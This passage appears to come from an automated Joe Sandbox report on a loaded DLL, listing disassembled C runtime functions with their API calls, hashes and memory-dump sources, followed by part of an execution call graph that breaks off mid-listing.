                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1096550386-0
                                                                                                • Opcode ID: 50eb4319f89d205e16c88159eb3cdaf39520fe7941bd2d0c6b472fdfcfb26144
                                                                                                • Instruction ID: 15b4db24f0c52991273d2f291cd5d2957f38f049bf9de9cdec2bb3f98edc1308
                                                                                                • Opcode Fuzzy Hash: 50eb4319f89d205e16c88159eb3cdaf39520fe7941bd2d0c6b472fdfcfb26144
                                                                                                • Instruction Fuzzy Hash: 7C51A3729012066BEB18CE65DC80EBB7ABDDF94714F154129FE14DA1D1EB31EC6186A0
                                                                                                Function 6F95BDF6 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetConsoleOutputCP.KERNEL32(6417AA48,00000000,00000000,?), ref: 6F95BE59
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F95C0AB
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F95C0F1
                                                                                                • GetLastError.KERNEL32 ref: 6F95C194
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                • String ID:
                                                                                                • API String ID: 2112829910-0
                                                                                                • Opcode ID: b2a688838fe8bf3955c95837d872743bc7241829b9ad8106a464be17ba41a4c7
                                                                                                • Instruction ID: 5b3195121e167717b88fb6d5c62fec892058d9986fe1edb15ec81f1ed54de01d
                                                                                                • Opcode Fuzzy Hash: b2a688838fe8bf3955c95837d872743bc7241829b9ad8106a464be17ba41a4c7
                                                                                                • Instruction Fuzzy Hash: E5D18A75D042589FDF15CFA8C8809EDBBB8EF0A314F14812AE855AB291D730E952CF50
                                                                                                Function 6F953E82 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1740715915-0
                                                                                                • Opcode ID: 8fd13cb57332c53c0b56804987c53cbba2a86d479b996acbaba7fe73ff76abaf
                                                                                                • Instruction ID: e94c86d600dc1b522e68b7f54a2c045815f7b12591a3e06eb6ac773d160087c9
                                                                                                • Opcode Fuzzy Hash: 8fd13cb57332c53c0b56804987c53cbba2a86d479b996acbaba7fe73ff76abaf
                                                                                                • Instruction Fuzzy Hash: 8B51CC72604606AFEB19CF36D852FAAB7BAEF64314F10412AED15472D1E731E874CB90
                                                                                                Function 6F95792D Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • GetLastError.KERNEL32 ref: 6F957991
                                                                                                • __dosmaperr.LIBCMT ref: 6F957998
                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6F9579D2
                                                                                                • __dosmaperr.LIBCMT ref: 6F9579D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1913693674-0
                                                                                                • Opcode ID: 106d213be465e8bbc35f12edc7bc4e2a72873f08a5b858c4c96e4d53c6193b83
                                                                                                • Instruction ID: 78a20d634b7c6c4bc48c33d63c8dfc9a800d1de47c4891f9f1ab74e1c0d8c718
                                                                                                • Opcode Fuzzy Hash: 106d213be465e8bbc35f12edc7bc4e2a72873f08a5b858c4c96e4d53c6193b83
                                                                                                • Instruction Fuzzy Hash: A621B07120471EAF9B50DFB5C99085AB7ADEF01368710C519EE18871D0D730EE31CBA2
                                                                                                Function 6F958C2E Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6F958C36
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C6E
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 158306478-0
                                                                                                • Opcode ID: d9790b809ee6d5fbb68c96597575fae9a4322b63d29cbfb3be0a61eba9aa171a
                                                                                                • Instruction ID: 9347431251b9575f5978865984a4f43ff6e5c38502980fab9cede6ebc57645cd
                                                                                                • Opcode Fuzzy Hash: d9790b809ee6d5fbb68c96597575fae9a4322b63d29cbfb3be0a61eba9aa171a
                                                                                                • Instruction Fuzzy Hash: 0D11A5F151A615BFB71597B58ECCCAF396CDF562A97000114F501952C5EB30ED21C7B1
                                                                                                Function 6F95D916 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000), ref: 6F95D92D
                                                                                                • GetLastError.KERNEL32(?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?,?,6F95C78B,00000000), ref: 6F95D939
                                                                                                  • Part of subcall function 6F95D8FF: CloseHandle.KERNEL32(FFFFFFFE,6F95D949,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?), ref: 6F95D90F
                                                                                                • ___initconout.LIBCMT ref: 6F95D949
                                                                                                  • Part of subcall function 6F95D8C1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F95D8F0,6F95D0C4,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D8D4
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D95E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                • Opcode ID: 86ea7d3a8b6db4968cf77ff69b9186062e16c007ab02fe31077746fe7a85e8a4
                                                                                                • Instruction ID: 8be10e3987927ed1fee0474222823d1413298eda69ff01bfbbaaef7112f550fb
                                                                                                • Opcode Fuzzy Hash: 86ea7d3a8b6db4968cf77ff69b9186062e16c007ab02fe31077746fe7a85e8a4
                                                                                                • Instruction Fuzzy Hash: 61F0303640A555BBEF165F91DC44A993F77FF093B0B044059FB189A260CB32E930DB91
                                                                                                Function 6F954483 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F9544A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2118026453-2084237596
                                                                                                • Opcode ID: f0777ed0d399748d5e30526737e154581491d4571748bf396a66f906d37686cd
                                                                                                • Instruction ID: b081194dbf2f0f46654faa82a9f911484b17bc410737f2bd3b4605dd9e6d1423
                                                                                                • Opcode Fuzzy Hash: f0777ed0d399748d5e30526737e154581491d4571748bf396a66f906d37686cd
                                                                                                • Instruction Fuzzy Hash: 8D4159B1900209AFDF05CFA8D891AEE7BB9BF48308F148199F91467291D336E971DF51

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:1316
                                                                                                Total number of Limit Nodes:27
                                                                                                execution_graph 8644 6f955391 8676 6f956c3d 8644->8676 8647 6f9553cc 8649 6f955404 8647->8649 8650 6f9553d0 8647->8650 8648 6f9554a1 8653 6f954f7d _Deallocate 11 API calls 8648->8653 8654 6f95546d 8649->8654 8655 6f956a7b __dosmaperr 14 API calls 8649->8655 8651 6f9553d6 8650->8651 8652 6f9553e3 8650->8652 8656 6f956a8e ___free_lconv_mon 14 API calls 8651->8656 8657 6f9577f8 44 API calls 8652->8657 8658 6f9554ab 8653->8658 8662 6f956a8e ___free_lconv_mon 14 API calls 8654->8662 8659 6f955421 8655->8659 8665 6f9553db 8656->8665 8660 6f9553eb 8657->8660 8661 6f956a7b __dosmaperr 14 API calls 8659->8661 8663 6f956a8e ___free_lconv_mon 14 API calls 8660->8663 8664 6f955428 8661->8664 8662->8665 8663->8665 8668 6f956a7b __dosmaperr 14 API calls 8664->8668 8666 6f951cf9 CatchGuardHandler 5 API calls 8665->8666 8667 6f95549f 8666->8667 8669 6f955442 8668->8669 8670 6f955447 8669->8670 8671 6f955468 8669->8671 8673 6f956a7b __dosmaperr 14 API calls 8669->8673 8674 6f956a8e ___free_lconv_mon 14 API calls 8670->8674 8672 6f956a7b __dosmaperr 14 API calls 8671->8672 8672->8654 8675 6f955455 8673->8675 8674->8665 8675->8670 8675->8671 8679 6f956ac8 8676->8679 8680 6f956ad4 __FrameHandler3::FrameUnwindToState 8679->8680 8687 6f956933 EnterCriticalSection 8680->8687 8682 6f956adf 8688 6f956b2d 8682->8688 8687->8682 8689 6f956b3c 8688->8689 8690 6f956b4f 8688->8690 8691 6f956a7b __dosmaperr 14 API calls 8689->8691 8690->8689 8692 6f956b62 8690->8692 8693 6f956b41 8691->8693 8709 6f956bd0 8692->8709 8695 6f954f50 ___std_exception_copy 39 API calls 8693->8695 8701 6f956afb 8695->8701 8696 6f956b6b __FrameHandler3::FrameUnwindToState 8697 6f956ba7 8696->8697 8698 6f956b96 8696->8698 8696->8701 8700 6f956040 ___std_exception_copy 39 API calls 8697->8700 8699 6f956a7b __dosmaperr 14 API calls 8698->8699 8699->8701 8702 6f956bb2 8700->8702 8706 6f956b24 8701->8706 8702->8701 8703 6f956bc3 8702->8703 8704 6f954f7d _Deallocate 11 API calls 8703->8704 8705 6f956bcf 8704->8705 8747 6f95697b LeaveCriticalSection 8706->8747 8708 6f9553bc 8708->8647 8708->8648 8711 6f956bdd 8709->8711 8710 6f956c30 8710->8696 8711->8710 8713 6f95a89b 8711->8713 8714 6f95a8af 8713->8714 8715 6f95a8a9 8713->8715 8714->8711 8716 6f95cc30 8715->8716 8717 6f95cbe8 8715->8717 8729 6f95cc46 8716->8729 8719 6f95cbee 8717->8719 8720 6f95cc0b 8717->8720 8721 6f956a7b __dosmaperr 14 API calls 8719->8721 8724 6f956a7b __dosmaperr 14 API calls 8720->8724 8728 6f95cc29 8720->8728 8722 6f95cbf3 8721->8722 8723 6f954f50 ___std_exception_copy 39 API calls 8722->8723 8725 6f95cbfe 8723->8725 8726 6f95cc1a 8724->8726 8725->8711 8727 6f954f50 ___std_exception_copy 39 API calls 8726->8727 8727->8725 8728->8711 8730 6f95cc56 8729->8730 8731 6f95cc70 8729->8731 8734 6f956a7b __dosmaperr 14 API calls 8730->8734 8732 6f95cc8f 8731->8732 8733 6f95cc78 8731->8733 8736 6f95ccb2 8732->8736 8737 6f95cc9b 8732->8737 8735 6f956a7b __dosmaperr 14 API calls 8733->8735 8738 6f95cc5b 8734->8738 8739 6f95cc7d 8735->8739 8742 6f9576bf 39 API calls 8736->8742 8745 6f95cc66 8736->8745 8740 6f956a7b __dosmaperr 14 API calls 8737->8740 8741 6f954f50 ___std_exception_copy 39 API calls 8738->8741 8743 6f954f50 ___std_exception_copy 39 API calls 8739->8743 8744 6f95cca0 8740->8744 8741->8745 8742->8745 8743->8745 8746 6f954f50 ___std_exception_copy 39 API calls 8744->8746 8745->8725 8746->8745 8747->8708 9436 6f955e81 9437 6f955e1f __EH_prolog3 9436->9437 9438 6f955e89 9436->9438 9441 6f955ce4 9437->9441 9440 6f955e4c __DllMainCRTStartup@12 9442 6f955cf0 __FrameHandler3::FrameUnwindToState 9441->9442 9449 6f956933 EnterCriticalSection 9442->9449 9444 6f955cfe 9450 6f955d3f 9444->9450 9449->9444 9451 6f955d5e 9450->9451 9452 6f955d0b 9450->9452 9451->9452 9453 6f956a8e ___free_lconv_mon 14 API calls 9451->9453 9454 6f955d33 9452->9454 9453->9452 9457 6f95697b LeaveCriticalSection 9454->9457 9456 6f955d1c 9456->9440 9457->9456 8748 6f951000 8761 6f951360 8748->8761 8750 6f95101d 8751 6f951360 41 API calls 8750->8751 8752 6f95102a 8751->8752 8765 6f95537b 8752->8765 8756 6f95105b 8757 6f951560 task 39 API calls 8756->8757 8758 6f951063 8757->8758 8759 6f951cf9 CatchGuardHandler 5 API calls 8758->8759 8760 6f95106d 8759->8760 8762 6f951376 8761->8762 8771 6f9519e0 8762->8771 8764 6f9513a1 task 8764->8750 8766 6f95519b __FrameHandler3::FrameUnwindToState 21 API calls 8765->8766 8767 6f951053 8766->8767 8768 6f951560 8767->8768 8873 6f9518b0 8768->8873 8770 6f95156f task 8770->8756 8772 6f9519f0 8771->8772 8775 6f951a10 8772->8775 8774 6f951a09 8774->8764 8776 6f951a68 8775->8776 8778 6f951a24 task 8775->8778 8779 6f9511f0 8776->8779 8778->8774 8780 6f951201 8779->8780 8782 6f95120b task 8780->8782 8787 6f951990 8780->8787 8790 6f9519a0 8782->8790 8784 6f95123d task 8786 6f951292 8784->8786 8794 6f951ad0 8784->8794 8786->8778 8797 6f951c9b 8787->8797 8791 6f9519b0 allocator 8790->8791 8829 6f9510a0 8791->8829 8865 6f9511a0 8794->8865 8796 6f951ae4 8796->8786 8802 6f951c23 8797->8802 8801 6f951cba 8808 6f951bd3 8802->8808 8805 6f952f62 8806 6f952f7c 8805->8806 8807 6f952fa9 RaiseException 8805->8807 8806->8807 8807->8801 8811 6f952ee0 8808->8811 8812 6f952eed 8811->8812 8818 6f951bff 8811->8818 8812->8818 8819 6f955549 8812->8819 8815 6f952f1a 8826 6f9555ad 8815->8826 8816 6f956040 ___std_exception_copy 39 API calls 8816->8815 8818->8805 8824 6f95786a _unexpected 8819->8824 8820 6f9578a8 8821 6f956a7b __dosmaperr 14 API calls 8820->8821 8823 6f952f0a 8821->8823 8822 6f957893 HeapAlloc 8822->8823 8822->8824 8823->8815 8823->8816 8824->8820 8824->8822 8825 6f9554c6 _Allocate EnterCriticalSection LeaveCriticalSection 8824->8825 8825->8824 8827 6f956a8e ___free_lconv_mon 14 API calls 8826->8827 8828 6f9555c5 8827->8828 8828->8818 8830 6f9510ac 8829->8830 8831 6f9510ba 8829->8831 8835 6f9510e0 8830->8835 8833 6f9510b5 8831->8833 8843 6f951750 8831->8843 8833->8784 8836 6f9510f7 8835->8836 8837 6f9510fc 8835->8837 8846 6f951890 8836->8846 8839 6f951750 _Allocate 16 API calls 8837->8839 8840 6f951105 8839->8840 8842 6f951120 8840->8842 8850 6f954f60 8840->8850 8842->8833 8855 6f951cbb 8843->8855 8847 6f95189e stdext::threads::lock_error::lock_error 8846->8847 8848 6f952f62 std::_Xinvalid_argument RaiseException 8847->8848 8849 6f9518ac 8848->8849 8849->8837 8851 6f954e9c ___std_exception_copy 39 API calls 8850->8851 8852 6f954f6f 8851->8852 8853 6f954f7d _Deallocate 11 API calls 8852->8853 8854 6f954f7c 8853->8854 8857 6f951cc0 8855->8857 8856 6f955549 ___std_exception_copy 15 API calls 8856->8857 8857->8856 8858 6f95175c 8857->8858 8859 6f9554c6 _Allocate 2 API calls 8857->8859 8861 6f951cdc _Allocate 8857->8861 8858->8833 8859->8857 8860 6f9520a9 stdext::threads::lock_error::lock_error 8862 6f952f62 std::_Xinvalid_argument RaiseException 8860->8862 8861->8860 8863 6f952f62 std::_Xinvalid_argument RaiseException 8861->8863 8864 6f9520c6 8862->8864 8863->8860 8866 6f9511b9 _MallocaArrayHolder 8865->8866 8867 6f9511ac 8865->8867 8866->8796 8869 6f9516e0 8867->8869 8870 6f95171e 8869->8870 8871 6f954f60 _Deallocate 39 API calls 8870->8871 8872 6f951739 8870->8872 8871->8870 8872->8866 8874 6f9518c1 task 8873->8874 8875 6f951905 task 8874->8875 8876 6f951ad0 allocator 39 API calls 8874->8876 8875->8770 8876->8875 7863 6f956cb6 7864 6f956cc5 7863->7864 7865 6f956cdd 7863->7865 7987 6f956a7b 7864->7987 7865->7864 7870 6f956cf4 _strrchr 7865->7870 7869 6f956cd5 7871 6f956d7f _strrchr 7870->7871 7993 6f9578b8 7870->7993 7872 6f956da2 7871->7872 7873 6f956dcd 7871->7873 7911 6f9577f8 7872->7911 7879 6f9578b8 _unexpected 14 API calls 7873->7879 7875 6f956daa 7877 6f956db4 7875->7877 7878 6f956d46 7875->7878 7924 6f956eab 7877->7924 7883 6f956a8e ___free_lconv_mon 14 API calls 7878->7883 7882 6f956de9 7879->7882 7885 6f956df1 7882->7885 7886 6f956e00 7882->7886 7883->7869 7884 6f956dc3 7892 6f956a8e ___free_lconv_mon 14 API calls 7884->7892 7889 6f956a8e ___free_lconv_mon 14 API calls 7885->7889 7887 6f956040 ___std_exception_copy 39 API calls 7886->7887 7890 6f956e0b 7887->7890 7889->7884 7893 6f956e9c 7890->7893 7895 6f956a7b __dosmaperr 14 API calls 7890->7895 7892->7869 8024 6f954f7d IsProcessorFeaturePresent 7893->8024 7902 6f956e23 7895->7902 7897 6f956ea8 7899 6f956040 ___std_exception_copy 39 API calls 7899->7902 7901 6f9577f8 44 API calls 7901->7902 7902->7893 7902->7899 7902->7901 7903 6f956e6d 7902->7903 7905 6f956e57 7902->7905 7904 6f956a7b __dosmaperr 14 API calls 7903->7904 7906 6f956e72 7904->7906 7907 6f956a8e ___free_lconv_mon 14 API calls 7905->7907 7908 6f956eab 53 API calls 7906->7908 7907->7878 7909 6f956e86 7908->7909 7910 6f956a8e ___free_lconv_mon 14 API calls 7909->7910 7910->7884 7912 6f957814 7911->7912 7913 6f957806 7911->7913 8054 6f957741 7912->8054 8028 6f957532 7913->8028 7920 6f957842 7922 6f956a8e ___free_lconv_mon 14 API calls 7920->7922 7923 6f957864 7920->7923 7921 6f957532 41 API calls 7921->7920 7922->7923 7923->7875 7925 6f956ece 7924->7925 7926 6f956eb9 7924->7926 7925->7926 7929 6f956ee4 7925->7929 7930 6f956eda 7925->7930 7927 6f956a7b __dosmaperr 14 API calls 7926->7927 7928 6f956ebe 7927->7928 7931 6f954f50 ___std_exception_copy 39 API calls 7928->7931 7934 6f956f22 7929->7934 7935 6f956f0b 7929->7935 7932 6f956a68 __dosmaperr 14 API calls 7930->7932 7933 6f956ec9 7931->7933 7932->7926 7933->7884 8539 6f9571ed 7934->8539 7937 6f956a8e ___free_lconv_mon 14 API calls 7935->7937 7939 6f956f13 7937->7939 7942 6f956a8e ___free_lconv_mon 14 API calls 7939->7942 7940 6f956f44 7943 6f956a8e ___free_lconv_mon 14 API calls 7940->7943 7941 6f956f6c 7946 6f956a68 __dosmaperr 14 API calls 7941->7946 7944 6f956f1e 7942->7944 7945 6f956f4c 7943->7945 7944->7884 7947 6f956a8e ___free_lconv_mon 14 API calls 7945->7947 7948 6f956f7d __FrameHandler3::FrameUnwindToState 7946->7948 7949 6f956f57 7947->7949 8542 6f95ae14 7948->8542 7950 6f956a8e ___free_lconv_mon 14 API calls 7949->7950 7950->7944 7953 6f957014 GetLastError 7956 6f956a21 __dosmaperr 14 API calls 7953->7956 7954 6f956fd6 7957 6f957039 7954->7957 7958 6f956fda WaitForSingleObject GetExitCodeProcess 7954->7958 7955 6f9570af 7959 6f95535e __FrameHandler3::FrameUnwindToState 21 API calls 7955->7959 7960 6f957020 7956->7960 7961 6f95703e 7957->7961 7962 6f95707a 7957->7962 7958->7953 7963 6f956ff3 7958->7963 7964 6f9570b6 7959->7964 7965 6f957025 CloseHandle 7960->7965 7966 6f95702c 7960->7966 7970 6f957042 CloseHandle 7961->7970 7971 6f957049 7961->7971 7967 6f957085 7962->7967 7968 6f95707e CloseHandle 7962->7968 7972 6f957004 7963->7972 7973 6f956ffd CloseHandle 7963->7973 7965->7966 7969 6f957030 CloseHandle 7966->7969 7975 6f95700f 7966->7975 7974 6f956a8e ___free_lconv_mon 14 API calls 7967->7974 7968->7967 7969->7975 7970->7971 7971->7975 7976 6f95704d CloseHandle 7971->7976 7972->7975 7978 6f957008 CloseHandle 7972->7978 7973->7972 7979 6f95708d 7974->7979 7977 6f956a8e ___free_lconv_mon 14 API calls 7975->7977 7976->7975 7980 6f95705e 7977->7980 7978->7975 7981 6f956a8e ___free_lconv_mon 14 API calls 7979->7981 7982 6f956a8e ___free_lconv_mon 14 API calls 7980->7982 7983 6f957099 7981->7983 7984 6f95706a 7982->7984 7985 6f956a8e ___free_lconv_mon 14 API calls 7983->7985 7986 6f956a8e ___free_lconv_mon 14 API calls 7984->7986 7985->7944 7986->7944 7988 6f9566b8 __dosmaperr 14 API calls 7987->7988 7989 6f956a80 7988->7989 7990 6f954f50 7989->7990 8587 6f954e9c 7990->8587 7998 6f9578c5 _unexpected 7993->7998 7994 6f957905 7996 6f956a7b __dosmaperr 13 API calls 7994->7996 7995 6f9578f0 RtlAllocateHeap 7997 6f956d3e 7995->7997 7995->7998 7996->7997 7997->7878 8000 6f956040 7997->8000 7998->7994 7998->7995 7999 6f9554c6 _Allocate 2 API calls 7998->7999 7999->7998 8002 6f95604e 8000->8002 8004 6f95605c 8000->8004 8001 6f956a7b __dosmaperr 14 API calls 8003 6f956064 8001->8003 8002->8004 8007 6f956074 8002->8007 8005 6f954f50 ___std_exception_copy 39 API calls 8003->8005 8004->8001 8006 6f95606e 8005->8006 8006->7893 8009 6f95a98c 8006->8009 8007->8006 8008 6f956a7b __dosmaperr 14 API calls 8007->8008 8008->8003 8010 6f95a99a 8009->8010 8015 6f95a9a8 8009->8015 8010->8015 8016 6f95a9cf 8010->8016 8011 6f956a7b __dosmaperr 14 API calls 8012 6f95a9b0 8011->8012 8013 6f954f50 ___std_exception_copy 39 API calls 8012->8013 8014 6f956d6b 8013->8014 8014->7893 8018 6f956a8e 8014->8018 8015->8011 8016->8014 8017 6f956a7b __dosmaperr 14 API calls 8016->8017 8017->8012 8019 6f956ac3 8018->8019 8020 6f956a99 HeapFree 8018->8020 8019->7871 8020->8019 8021 6f956aae GetLastError 8020->8021 8022 6f956abb __dosmaperr 8021->8022 8023 6f956a7b __dosmaperr 12 API calls 8022->8023 8023->8019 8025 6f954f89 8024->8025 8026 6f954d54 __FrameHandler3::FrameUnwindToState 8 API calls 8025->8026 8027 6f954f9e GetCurrentProcess TerminateProcess 8026->8027 8027->7897 8029 6f957567 8028->8029 8030 6f95754c 8028->8030 8032 6f957573 8029->8032 8033 6f95758e GetFileAttributesExW 8029->8033 8062 6f956a68 8030->8062 8034 6f956a68 __dosmaperr 14 API calls 8032->8034 8035 6f95759f GetLastError 8033->8035 8044 6f9575ae 8033->8044 8037 6f957578 8034->8037 8065 6f956a21 8035->8065 8040 6f956a7b __dosmaperr 14 API calls 8037->8040 8039 6f956a7b __dosmaperr 14 API calls 8041 6f957559 8039->8041 8042 6f957580 8040->8042 8043 6f954f50 ___std_exception_copy 39 API calls 8041->8043 8046 6f954f50 ___std_exception_copy 39 API calls 8042->8046 8048 6f957563 8043->8048 8044->8048 8049 6f956a68 __dosmaperr 14 API calls 8044->8049 8045 6f956a7b __dosmaperr 14 API calls 8045->8048 8046->8048 8070 6f951cf9 8048->8070 8051 6f9575c6 8049->8051 8050 6f9575ee 8050->7875 8052 6f956a7b __dosmaperr 14 API calls 8051->8052 8053 6f9575ab 8052->8053 8053->8045 8268 6f9576bf 8054->8268 8058 6f957765 8059 6f9576a2 8058->8059 8483 6f9575f0 8059->8483 8077 6f9566b8 GetLastError 8062->8077 8064 6f956a6d 8064->8039 8066 6f956a68 __dosmaperr 14 API calls 8065->8066 8067 6f956a2c __dosmaperr 8066->8067 8068 6f956a7b __dosmaperr 14 API calls 8067->8068 8069 6f956a3f 8068->8069 8069->8053 8071 6f951d01 8070->8071 8072 6f951d02 IsProcessorFeaturePresent 8070->8072 8071->8050 8074 6f952109 8072->8074 8267 6f9520cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8074->8267 8076 6f9521ec 8076->8050 8078 6f9566ce 8077->8078 8082 6f9566d4 8077->8082 8100 6f9593b7 8078->8100 8097 6f9566d8 SetLastError 8082->8097 8105 6f9593f6 8082->8105 8084 6f9578b8 _unexpected 12 API calls 8085 6f956705 8084->8085 8086 6f95670d 8085->8086 8087 6f95671e 8085->8087 8088 6f9593f6 _unexpected 6 API calls 8086->8088 8089 6f9593f6 _unexpected 6 API calls 8087->8089 8090 6f95671b 8088->8090 8091 